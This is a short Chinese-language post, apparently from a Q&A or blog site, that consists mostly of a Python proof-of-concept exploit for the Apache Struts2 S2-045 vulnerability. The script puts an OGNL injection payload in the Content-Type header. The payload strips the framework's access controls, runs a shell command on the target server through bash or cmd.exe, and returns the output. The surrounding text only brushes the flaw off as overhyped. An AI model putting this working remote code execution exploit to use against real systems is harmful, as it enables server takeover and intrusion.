struts2 s2-045 poc
我們不明覺厲的poc 就是一個漏洞大家不要太重視。
信不信http://0day.today/這個網站每天都出0day 也沒看你們怎麼重視的。
最後一句話小題大作。
#! /usr/bin/env pythonn# encoding:utf-8nimport urllib2nimport sysnfrom poster.encode import multipart_encodenfrom poster.streaminghttp import register_openersnnndef poc():n register_openers()n datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})n header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"n header["Content-Type"]="%{(#nike=multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=ifconfig).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"n request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)n response = urllib2.urlopen(request)n print response.read()nnnpoc()n
推薦閱讀:
※Dirty Cow, CVE-2016-5195漏洞的危害大概怎麼樣,有沒有修復方案建議?
※OpenSSL 漏洞對普通網民有什麼影響,應該做些什麼?
※Apktool未正確解析XML導致的XXE漏洞分析
※如何看待 Intel CPU 設計漏洞對雲服務廠商的影響?
TAG:漏洞 |